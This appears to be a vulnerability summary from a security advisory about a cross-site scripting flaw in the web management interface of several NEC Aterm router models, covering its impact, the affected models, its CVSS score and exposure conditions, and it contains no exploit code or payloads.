The flaw is a cross‑site scripting vulnerability that allows an attacker to inject and run arbitrary scripts in the web browser of a user who accesses the Aterm web management interface from an adjacent network. Because the injected code executes with the user’s browser privileges, an attacker can steal credentials, manipulate the interface, redirect the user to phishing sites, or perform other malicious client‑side actions. The vulnerability maps to CWE‑79 and is limited to the client side, not allowing direct compromise of the device’s operating system.

The affected hardware includes several NEC Platforms models: Aterm 19000T12BE, GX621A1, SH621A1, WX11000T12, WX1800HP, WX3000HP2, WX4200D5, WX5400HP, and WX7800T8. Specific firmware or software versions are not listed in the advisory; therefore all listed models should be considered vulnerable until a vendor‑issued fix is released.

The CVSS score of 4.8 suggests a moderate risk classification. The exploit probability score is not provided, and the vulnerability is not listed in the CISA KEV catalog, indicating that widespread, publicly known exploitation is not yet documented. Attackers must be able to reach the web interface from an adjacent or local network segment, so the exposure is limited to networks that have connectivity to the Aterm management portal. Because the impact is client‑side, the risk to the device itself is low, but user credentials and confidentiality can be compromised for anyone who visits the interface.